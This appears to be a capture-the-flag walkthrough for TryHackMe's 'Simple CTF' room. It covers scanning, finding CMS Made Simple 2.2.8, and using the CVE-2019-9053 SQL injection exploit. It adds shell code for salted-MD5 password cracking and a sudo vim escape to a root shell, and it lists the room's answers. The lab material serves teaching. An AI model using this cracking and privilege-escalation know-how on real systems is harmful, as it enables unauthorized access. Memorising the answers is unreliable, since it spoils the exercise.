Simple CTF is just that: a beginner-level room on TryHackMe that exercises the core skills every CTF needs, namely scanning and enumeration, research, exploitation, and privilege escalation.
Enjoy the room!
Let’s kick off with the scan I run on every room: nmap.
The results show ports 21 (FTP), 80 (HTTP), and 2222 (SSH) open. SSH on a non-default port is the “higher port” the next question is asking about.
How many services are running under port 1000?
Answer: 2
What is running on the higher port?
Answer: SSH
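As an added example that is not part of the original write-up, here is how to answer those two questions from nmap’s grepable output rather than by reading a screenshot. The scan command at the top and the target IP are assumptions, and the scan text is a constructed sample in -oG format carrying the three ports the write-up reports (the service banners are illustrative only).

```shell
# Added example, not from the original write-up: answer the room's two nmap
# questions from the scan's grepable output instead of reading a screenshot.
# The scan command assumed here (the target IP is a placeholder):
#   nmap -sC -sV -p- -oG scan.gnmap 10.10.10.10
#
# SCAN is a CONSTRUCTED sample in nmap -oG format carrying the three open
# ports the write-up reports; the service banners are illustrative only.
SCAN='Host: 10.10.10.10 ()  Status: Up
Host: 10.10.10.10 ()  Ports: 21/open/tcp//ftp//vsftpd/, 80/open/tcp//http//Apache httpd/, 2222/open/tcp//ssh//OpenSSH/  Ignored State: closed (65532)'

# open_ports SCAN_TEXT -> "port service" per open TCP port, sorted by port.
# In -oG each port entry is port/state/proto/owner/service/rpc/version/,
# so with "/" as the separator the service name is field 5.
open_ports() {
  printf '%s\n' "$1" \
    | grep -o '[0-9][0-9]*/open/tcp//[^/]*' \
    | awk -F/ '{ print $1, $5 }' \
    | sort -n
}

# count_below SCAN_TEXT LIMIT -> number of open TCP ports numbered below LIMIT.
count_below() {
  open_ports "$1" | awk -v lim="$2" '$1 < lim { n++ } END { print n + 0 }'
}

# highest_service SCAN_TEXT -> service name on the highest-numbered open port.
highest_service() {
  open_ports "$1" | tail -n 1 | cut -d' ' -f2
}

open_ports "$SCAN"          # 21 ftp / 80 http / 2222 ssh
count_below "$SCAN" 1000    # 2
highest_service "$SCAN"     # ssh
```

The same functions work on a real scan.gnmap file via open_ports "$(cat scan.gnmap)"; filtered or closed ports never match the /open/tcp pattern, so they are ignored automatically.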
Since there is a web server, let’s look at the site for more information.
First, let’s just browse to the IP and see what we get.
It is the default Apache2 page, so there is not much to go on here.
Next, we can use gobuster to brute-force the site for additional directories.
Using the medium directory wordlist, gobuster finds a directory at “/simple”. Let’s browse to it and see what we find.
This is the default page of “CMS Made Simple”, and the footer in the bottom corner gives the version as 2.2.8. A CMS with a visible version number is exactly what the research step of a CTF is for.
Let’s see whether anything is published about this version by searching Google for “CMS Made Simple 2.2.8 exploit”.
The results include an Exploit-DB entry that matches: an unauthenticated, time-based blind SQL injection in the News module, tracked as CVE-2019-9053.
What’s the CVE you’re using against the application?
Answer: CVE-2019-9053
To what kind of vulnerability is the application vulnerable?
Answer: SQLi
At this point we know the open ports, what the web application is, and a candidate exploit.
The exploit is a Python script, so I copied it into a .py file on my attack box.
Let’s run it. If you don’t know a script’s syntax, running it with no arguments usually prints a usage message.
The usage message shows that the target URL goes after -u and that --crack -w <wordlist> makes the script crack the recovered password hash against a wordlist.
Now run it against the target with both options and see what comes back.
(Note: at first the script would not run because the “termcolor” Python module was not installed on my machine. Fix: pip install termcolor)
Bingo! The exploit returns a username and a cracked password. Because the injection is time-based blind, extraction is slow and a flaky connection can corrupt the recovered salt or hash; if the output looks like garbage or the crack fails, rerun the script before blaming the wordlist.
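To show what --crack -w actually does, here is the offline half of that step as an added example; it is neither the original write-up’s code nor the Exploit-DB script. It assumes, based on my reading of the script, that the stored hash is md5(salt + password) with the salt pulled from the site’s preferences (verify against your copy of the script). The salt, the wordlist and the password used to derive the hash are constructed so the example checks itself; they are not the room’s values.

```shell
# Added example, not part of the original write-up or the Exploit-DB script:
# the offline half of the script's "--crack -w" option. The blind SQLi stage
# (not reproduced here) recovers a salt and an MD5 hex digest; the cracker
# then tests md5(salt + candidate) for each wordlist entry. That scheme is my
# reading of the script's check (assumption: verify against your copy).
#
# SALT and the password used to derive HASH are CONSTRUCTED so the example
# is self-checking; they are not the room's values.
SALT='1dac0d92e9fa6bb2'
HASH=$(printf '%s%s' "$SALT" 'secret' | md5sum | cut -d' ' -f1)

# crack_salted_md5 SALT HASH < wordlist
#   prints the first word w with md5(SALT w) == HASH and returns 0;
#   prints nothing and returns 1 when the list is exhausted.
crack_salted_md5() {
  salt=$1
  target=$2
  while IFS= read -r word || [ -n "$word" ]; do
    digest=$(printf '%s%s' "$salt" "$word" | md5sum | cut -d' ' -f1)
    if [ "$digest" = "$target" ]; then
      printf '%s\n' "$word"
      return 0
    fi
  done
  return 1
}

# A tiny CONSTRUCTED wordlist standing in for rockyou-style input.
wordlist() {
  printf '%s\n' password 123456 letmein secret qwerty
}

wordlist | crack_salted_md5 "$SALT" "$HASH"   # secret
```

Against a real wordlist you would run crack_salted_md5 "$SALT" "$HASH" < /path/to/wordlist. Each candidate costs one MD5, so the crack itself is fast; the slow, fragile part of the whole exploit is the time-based extraction that produces the salt and hash in the first place.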
What’s the password?
Answer: secret
Where can you login with the details obtained?
Answer: SSH
With those credentials we can SSH into the target; remember that SSH is listening on port 2222, so pass -p 2222 rather than relying on the default port.
An ls in the home directory shows “user.txt”; read it for the first flag.
What’s the user flag?
Answer: the contents of user.txt (not reproduced here)
Next, let’s check whether any other users have home directories under /home.
Is there any other user in the home directory? What’s its name?
Answer: sunbath
On to privilege escalation! I like to start with “sudo -l” to see what the current user can run through sudo.
The user “mitch” can run /usr/bin/vim as root without a password (NOPASSWD). With that, let’s check GTFOBins for a sudo escape for vim.
GTFOBins lists a one-liner that spawns a shell from inside vim; run through sudo, that shell is root’s.
What can you leverage to spawn a privileged shell?
Answer: vim
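As an added example that is not part of the original write-up, the following triages sudo -l output for NOPASSWD entries and prints the GTFOBins sudo escape for vim that the screenshot would show. The sudo -l text is a constructed sample in the format sudo prints; the host name “ctf” is made up, while the vim entry is what the write-up reports.

```shell
# Added example, not from the original write-up: triage "sudo -l" output for
# NOPASSWD entries and print the GTFOBins sudo escape for vim.
# SUDO_L is a CONSTRUCTED sample in the format sudo prints; the host name
# "ctf" is made up, the vim entry is what the write-up reports.
SUDO_L='Matching Defaults entries for mitch on ctf:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User mitch may run the following commands on ctf:
    (root) NOPASSWD: /usr/bin/vim'

# nopasswd_binaries SUDO_L_TEXT -> one path per line that sudo runs without
# a password (handles comma-separated lists on one NOPASSWD line).
nopasswd_binaries() {
  printf '%s\n' "$1" \
    | grep 'NOPASSWD:' \
    | sed 's/.*NOPASSWD:[[:space:]]*//' \
    | tr ',' '\n' \
    | sed 's/^[[:space:]]*//; s/[[:space:]]*$//'
}

# vim_escape VIM_PATH -> the GTFOBins sudo escape for vim. "-c" runs an ex
# command at startup and ":!cmd" runs cmd from vim, which sudo started as
# root, so the child shell inherits root.
vim_escape() {
  printf "sudo %s -c ':!/bin/sh'\n" "$1"
}

# Pick the vim entry out of the list and show the command to type.
for bin in $(nopasswd_binaries "$SUDO_L"); do
  case "$bin" in
    */vim) vim_escape "$bin" ;;   # sudo /usr/bin/vim -c ':!/bin/sh'
  esac
done
# In the shell that appears, "id" should report uid=0(root).
```

The escape works because sudo runs the whole vim process as root; any command vim spawns, including the shell from :!, keeps that uid. If sudo -l had listed a different binary, GTFOBins is the place to look up its equivalent.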
It worked! Confirm with id that we are root; then all that is left is to read the root flag from /root and the room is complete.
What’s the root flag?
Answer: the contents of root.txt (not reproduced here)
Congrats!
Overall an easy but good room: it covers nmap and gobuster, researching an exploit for a specific software version, checking GTFOBins, and escalating to root for the final flag.